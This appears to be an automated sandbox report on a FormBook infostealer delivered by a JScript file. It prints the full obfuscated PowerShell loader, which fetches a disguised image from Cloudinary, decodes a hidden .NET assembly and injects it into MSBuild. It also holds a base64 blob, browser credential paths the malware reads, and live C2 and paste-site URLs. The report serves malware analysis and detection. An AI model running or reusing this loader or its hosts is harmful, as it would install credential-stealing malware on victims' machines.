hahqayqbyacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakageazabyag8aiaa9acaajabyaguababhahqayqbyac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakag0ayqbkahiaaqbnageabablahqazqapadsajabvagyadabhagwabqbvahgaaqbzaguaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgajabhagqacgbvackaowakahgayqbxahuazqbjageaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakagiacgbpag0aiaa9acaajwa8adwaqgbbafmarqa2adqaxwbfae4araa+ad4ajwa7acqaywbvag4adablag4aaabvacaapqagacqabwbmahqayqbsag0abwb4agkacwblac4asqbuagqazqb4ae8azgaoacqaeabhaheadqblagmayqapadsajabjag8ababhahaacwbvacaapqagacqabwbmahqayqbsag0abwb4agkacwblac4asqbuagqazqb4ae8azgaoacqaygbyagkabqapadsajabjag8abgb0aguabgboag8aiaatagcazqagadaaiaatageabgbkacaajabjag8ababhahaacwbvacaalqbnahqaiaakagmabwbuahqazqbuaggabwa7acqaywbvag4adablag4aaabvacaakwa9acaajab4ageacqb1aguaywbhac4atablag4azwb0aggaowakaheadqbpag4ayqbsacaapqagacqaywbvagwayqbwahmabwagac0aiaakagmabwbuahqazqbuaggabwa7acqayqbsag0azqbpagqaaqbuageaiaa9acaajabvagyadabhagwabqbvahgaaqbzagualgbtahuaygbzahqacgbpag4azwaoacqaywbvag4adablag4aaabvacwaiaakaheadqbpag4ayqbsackaowakagiadqbiaguababhacaapqagac0aagbvagkabgagacgajabhagwabqblagkazabpag4ayqauafqabwbdaggayqbyaeeacgbyageaeqaoackaiab8acaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagacqaxwagah0akqbbac0amqauac4alqaoacqayqbsag0azqbpagqaaqbuagealgbmaguabgbnahqaaaapaf0aowakageazabqahuadabvahiaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqaygb1agiazqbsageakqa7acqacabhagqacgbhahmadabvacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aew
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = new-object system.net.webclient;$adro = $relatar.downloaddata($madrigalete);$oftalmoxise = [system.text.encoding]::utf8.getstring($adro);$xaqueca = '<<base64_start>>';$brim = '<<base64_end>>';$contenho = $oftalmoxise.indexof($xaqueca);$colapso = $oftalmoxise.indexof($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.substring($contenho, $quinal);$bubela = -join ($almeidina.tochararray() | foreach-object { $_ })[-1..-($almeidina.length)];$adjutor = [system.convert]::frombase64string($bubela);$padrasto = [system.reflection.assembly]::load($adjutor);$manducar = [dnlib.io.home].getmethod('vai');$manducar.invoke($null, @('0/vafz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'msbuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $zooiatrologia = 'aqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsaaqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsajabtageazabyagkazwbhagwazqb0aguaiaa9acaajwboahqadabwahmaogavac8acgblahmalgbjagwabwb1agqaaqbuageacgb5ac4aywbvag0alwbkahkadabmagwadaa2adeabgavagkabqbhagcazqavahuacabsag8ayqbkac8adgaxadcamwazadeamwa0adkanaa3ac8aygbragwacab5ahmazqb5aguadqb0adqaaqbtahaadwa1adaabgaxac4aagbwagcaiaanadsajabyaguababhahqayqbyacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakageazabyag8aiaa9acaajabyaguababhahqayqbyac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakag0ayqbkahiaaqbnageabablahqazqapadsajabvagyadabhagwabqbvahgaaqbzaguaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgajabhagqacgbvackaowakahgayqbxahuazqbjageaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakagiacgbpag0aiaa9acaajwa8adwaqgbbafmarqa2adqaxwbfae4araa+ad4ajwa7acqaywbvag4adablag4aaabvacaapqagacqabwbmahqayqbsag0abwb4agkacwblac4asqbuagqazqb4ae8azgaoacqaeabhaheadqblagmayqapadsajabjag8ababhahaacwbvacaapqagacqabwbmahqayqbsag0abwb4agkacwblac4asqbuagqazqb4ae8azgaoacqaygbyagkabqapadsajabjag8abgb0aguabgboag8aiaatagcazqagadaaiaatageabgbkacaajabjag8ababhahaacwbvacaalqbnahqaiaakagmabwbuahqazqbuaggabwa7acqaywbvag4adablag4aaabvacaakwa9acaajab4ageacqb1aguaywbhac4atablag4azwb0aggaowakaheadqbpag4ayqbsacaapqagacqaywbvagwayqbwahmabwagac0aiaakagmabwbuahqazqbuaggabwa7acqayqbsag0azqbpagqaaqbuageaiaa9acaajabvagyadabhagwabqbvahgaaqbzagualgbtahuaygbzahqacgbpag4azwaoacqaywbvag4adablag4aaabvacwaiaakaheadqbpag4ayqbsackaowakagiadqbiaguababhacaapqagac0aagbvagkabgagacgajabhagwabqblagkazabpag4ayqauafqabwbdaggayqbyaeeacgbyageaeqaoackaiab8acaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagacqaxwagah0akqbbac0amqauac4alqaoacqayqbsag0azqbpagqaaqbuagealgbmaguabgbnahqaaaapaf0aowakageazabqahuadabvahiaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqaygb1agiazqbsageakqa7acqacabhagqacgbhahmadabvacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = new-object system.net.webclient;$adro = $relatar.downloaddata($madrigalete);$oftalmoxise = [system.text.encoding]::utf8.getstring($adro);$xaqueca = '<<base64_start>>';$brim = '<<base64_end>>';$contenho = $oftalmoxise.indexof($xaqueca);$colapso = $oftalmoxise.indexof($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.substring($contenho, $quinal);$bubela = -join ($almeidina.tochararray() | foreach-object { $_ })[-1..-($almeidina.length)];$adjutor = [system.convert]::frombase64string($bubela);$padrasto = [system.reflection.assembly]::load($adjutor);$manducar = [dnlib.io.home].getmethod('vai');$manducar.invoke($null, @('0/vafz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'msbuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information12
                  Scripting                  		Valid Accounts1
                  Exploitation for Client Execution                  		12
                  Scripting                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		LSASS Memory113
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		511
                  Process Injection                  		4
                  Obfuscated Files or Information                  		Security Account Manager121
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell                  		Login Hook1
                  Scheduled Task/Job                  		1
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging4
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567224 Sample: 1013911.js Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 38 paste.ee 2->38 40 www.yxni.vip 2->40 42 6 other IPs or domains 2->42 58 Suricata IDS alerts for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Yara detected FormBook 2->62 66 12 other signatures 2->66 10 wscript.exe 1 15 2->10         started        signatures3 64 Connects to a pastebin service (likely for C&C) 38->64 process4 dnsIp5 44 www.yxni.vip 192.186.57.30, 49751, 80 FEDERAL-ONLINE-GROUP-LLCUS United States 10->44 46 paste.ee 104.21.84.67, 443, 49730, 49738 CLOUDFLARENETUS United States 10->46 36 C:\Users\user\AppData\Local\Temp\ostaxa.js, ASCII 10->36 dropped 72 System process connects to network (likely due to code injection or exploit) 10->72 74 JScript performs obfuscated calls to suspicious functions 10->74 76 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->76 78 2 other signatures 10->78 15 cscript.exe 1 2 10->15         started        18 choice.exe 13 10->18         started        file6 signatures7 process8 signatures9 84 JScript performs obfuscated calls to suspicious functions 15->84 86 Suspicious powershell command line found 15->86 88 Bypasses PowerShell execution policy 15->88 20 powershell.exe 7 15->20         started        23 conhost.exe 15->23         started        90 Tries to steal Mail credentials (via file / registry access) 18->90 92 Tries to harvest and steal browser information (history, passwords, etc) 18->92 94 Modifies the context of a thread in another process (thread injection) 18->94 96 2 other signatures 18->96 25 firefox.exe 18->25         started        process10 signatures11 68 Suspicious powershell command line found 20->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 20->70 27 powershell.exe 14 16 20->27         started        31 conhost.exe 20->31         started        process12 dnsIp13 48 cloudinary.map.fastly.net 151.101.1.137, 443, 49731 FASTLYUS United States 27->48 80 Writes to foreign memory regions 27->80 82 Injects a PE file into a foreign processes 27->82 33 MSBuild.exe 27->33         started        signatures14 process15 signatures16 50 Modifies the context of a thread in another process (thread injection) 33->50 52 Maps a DLL or memory area into another process 33->52 54 Switches to a custom stack to bypass stack traces 33->54 56 Found direct / indirect Syscall (likely to bypass EDR) 33->56

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  1013911.js11%ReversingLabsScript-JS.Exploit.Generic

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.yxni.vip/skhs/?q2gYNc=YYGtc0vZDxBZaqOUfK8EjJlrwUEGCmw9C1cdleHi+lzAM/tSLZDkT6oQFAP0CoyED8RVRESu2LRjuGrjAaGK14wgZjrklmy8P/7KZtR3AGJqubIGbQJuqGM=&i7g0=S7yiJ01bbdLMH0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  paste.ee
                  		104.21.84.67
                  		truefalse
                    		high
                    cloudinary.map.fastly.net
                    		151.101.1.137
                    		truefalse
                      		high
                      s-part-0035.t-0009.t-msedge.net
                      		13.107.246.63
                      		truefalse
                        		high
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		high
                          www.yxni.vip
                          		192.186.57.30
                          		truetrue
                            		unknown
                            res.cloudinary.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://paste.ee/d/69SP6false
                                		high
                                https://paste.ee/r/5zfAV/0false
                                  		high
                                  http://www.yxni.vip/skhs/?q2gYNc=YYGtc0vZDxBZaqOUfK8EjJlrwUEGCmw9C1cdleHi+lzAM/tSLZDkT6oQFAP0CoyED8RVRESu2LRjuGrjAaGK14wgZjrklmy8P/7KZtR3AGJqubIGbQJuqGM=&i7g0=S7yiJ01bbdLMHtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabchoice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icochoice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://paste.eepowershell.exe, 00000005.00000002.1963200942.0000028286DEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com;wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://paste.ee/d/69Swscript.exe, 00000000.00000003.2389360512.000002375F128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398163728.000002375F129000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389226631.000002375F123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://analytics.paste.eewscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://paste.eewscript.exe, 00000000.00000003.2390482161.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390126097.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.0000028286DEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6powershell.exe, 00000003.00000002.2278601121.00000176B8678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://paste.ee/d/69SPwscript.exe, 00000000.00000003.2390482161.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390126097.000002375F11F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comwscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchoice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://paste.ee/wscript.exe, 00000000.00000003.2389360512.000002375F174000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390620725.000002375F17C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398310964.000002375F17E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://analytics.paste.ee;wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.2278601121.00000176B8690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
